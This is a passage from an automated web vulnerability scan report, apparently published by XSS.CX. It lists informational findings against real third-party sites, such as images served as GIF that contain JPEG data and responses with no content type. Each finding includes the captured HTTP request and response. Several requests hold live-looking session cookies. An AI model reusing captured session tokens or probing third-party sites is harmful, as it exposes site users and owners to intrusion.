Content-Length: 8485
Content-Type: image/gif
Last-Modified: Sun, 14 Nov 2010 15:09:40 GMT
Accept-Ranges: bytes
ETag: "8e15f8f5d84cb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:18 GMT

......JFIF.....`.`......Exif..II*...................................................................(...........2...............................................i.....................M.................
...[SNIP]...

30.44. http://www.passporterboards.com/forums/signaturepics/sigpic1001_7.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/signaturepics/sigpic1001_7.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/signaturepics/sigpic1001_7.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 33729
Content-Type: image/gif
Last-Modified: Sun, 06 Mar 2011 22:33:48 GMT
Accept-Ranges: bytes
ETag: "fa75768f4edccb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:04 GMT

......JFIF.....H.H......Exif..MM.*...................1...../...V.2...........i.....................J....................................................................................................
...[SNIP]...

30.45. http://www.passporterboards.com/forums/signaturepics/sigpic10872_14.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/signaturepics/sigpic10872_14.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/signaturepics/sigpic10872_14.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 14252
Content-Type: image/gif
Last-Modified: Mon, 07 Feb 2011 15:59:19 GMT
Accept-Ranges: bytes
ETag: "52447dfadfc6cb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:22 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.46. http://www.passporterboards.com/forums/signaturepics/sigpic17690_3.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/signaturepics/sigpic17690_3.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/signaturepics/sigpic17690_3.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 22944
Content-Type: image/gif
Last-Modified: Fri, 23 Jul 2010 00:58:06 GMT
Accept-Ranges: bytes
ETag: "6043511c22acb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:19 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.47. http://www.passporterboards.com/forums/signaturepics/sigpic18031_10.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/signaturepics/sigpic18031_10.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/signaturepics/sigpic18031_10.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 22945
Content-Type: image/gif
Last-Modified: Wed, 01 Sep 2010 22:02:26 GMT
Accept-Ranges: bytes
ETag: "227c3a5d214acb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:24 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.48. http://www.passporterboards.com/forums/signaturepics/sigpic18759_24.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/signaturepics/sigpic18759_24.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/signaturepics/sigpic18759_24.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 24784
Content-Type: image/gif
Last-Modified: Sun, 07 Nov 2010 19:14:00 GMT
Accept-Ranges: bytes
ETag: "3273e3eeaf7ecb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:20 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.49. http://www.passporterboards.com/forums/signaturepics/sigpic21228_3.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/signaturepics/sigpic21228_3.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/signaturepics/sigpic21228_3.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 18508
Content-Type: image/gif
Last-Modified: Tue, 13 Jul 2010 15:51:13 GMT
Accept-Ranges: bytes
ETag: "5e4e7938a322cb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:22 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.50. http://www.passporterboards.com/forums/signaturepics/sigpic3404_109.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/signaturepics/sigpic3404_109.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/signaturepics/sigpic3404_109.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 29607
Content-Type: image/gif
Last-Modified: Fri, 29 Apr 2011 09:13:40 GMT
Accept-Ranges: bytes
ETag: "1ae929bb4d6cc1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:08 GMT

......JFIF................................................... ... ......

.....
.

...........
...

........,.....................................
...[SNIP]...

30.51. http://www.passporterboards.com/forums/signaturepics/sigpic7184_20.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/signaturepics/sigpic7184_20.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/signaturepics/sigpic7184_20.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 24143
Content-Type: image/gif
Last-Modified: Fri, 05 Nov 2010 22:39:29 GMT
Accept-Ranges: bytes
ETag: "e734e04e3a7dcb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:19 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.52. http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.restorationhardware.com
Path:	/sitewide/includes/footer/email-sign-up.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /sitewide/includes/footer/email-sign-up.jsp HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; TS1c138a=3df5ee0d2da226cbb8724d51bbf2990e2efa223a5124b4964dd084fd; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; engagement=1; fsr.a=1305509985179

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 2371
Date: Mon, 16 May 2011 01:39:47 GMT
Connection: close
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 01:39:47 GMT

<h3 class="brand">Email Signup</h3>
<form action="/customer-service/footer-email-signup-thank-you.jsp" class="hasrequired" name="submitEmail" method="get" id="submitEmail"><input value="ISO-8859-1" ty
...[SNIP]...

30.53. http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.toshibadirect.com
Path:	/js/coremetrics/emptyfunctions.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /js/coremetrics/emptyfunctions.inc HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:40:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Tue, 24 Nov 2009 23:13:36 GMT
Accept-Ranges: bytes
Content-Length: 1064
Content-Type: text/plain

<!--
function callCMEventTag(){}
function cmCreateConversionEventTag(){}
function cmCreateCouponOrderTag(){}
function cmCreateCouponTag(){}
function cmCreateDefaultPageviewTag(){}
function cmCreateErr
...[SNIP]...

31. Content type is not specified previous
There are 7 instances of this issue:

http://ads.bluelithium.com/st
http://localhost:50386/favicon.ico
http://localhost:50386/hoyt.net
http://localhost:50386/hoyt.net/sitefinity
http://pcm1.map.pulsemgr.com/uds/pc
http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

31.1. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Request

GET /st?ad_type=ad&ad_size=728x90&section=1565884 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:23:04 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 01:23:04 GMT
Pragma: no-cache
Content-Length: 4293
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

31.2. http://localhost:50386/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://localhost:50386
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: localhost:50386
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Cassini/4.1.1395.0
Date: Mon, 16 May 2011 00:09:32 GMT
Content-Length: 1203
Connection: Close

<html>
<head>
<title>Not Found</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
p {font-family:"Verdana";font-wei
...[SNIP]...

31.3. http://localhost:50386/hoyt.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://localhost:50386
Path:	/hoyt.net

Request

GET /hoyt.net HTTP/1.1
Host: localhost:50386
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

31.4. http://localhost:50386/hoyt.net/sitefinity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://localhost:50386
Path:	/hoyt.net/sitefinity

Request

GET /hoyt.net/sitefinity HTTP/1.1
Host: localhost:50386
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Cassini/4.1.1395.0
Date: Mon, 16 May 2011 00:09:59 GMT
Content-Length: 1203
Connection: Close

<html>
<head>
<title>Not Found</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
p {font-family:"Verdana";font-wei
...[SNIP]...

31.5. http://pcm1.map.pulsemgr.com/uds/pc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pcm1.map.pulsemgr.com
Path:	/uds/pc

Request

GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1
Host: pcm1.map.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Mon, 16 May 2011 01:20:15 GMT

GIF89a.............!.......,...........D..;

31.6. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/m2/sonycomputerentertai/sc/standard

Request

GET /m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

31.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Request

Response

Report generated by XSS.CX at Mon May 16 06:37:31 CDT 2011.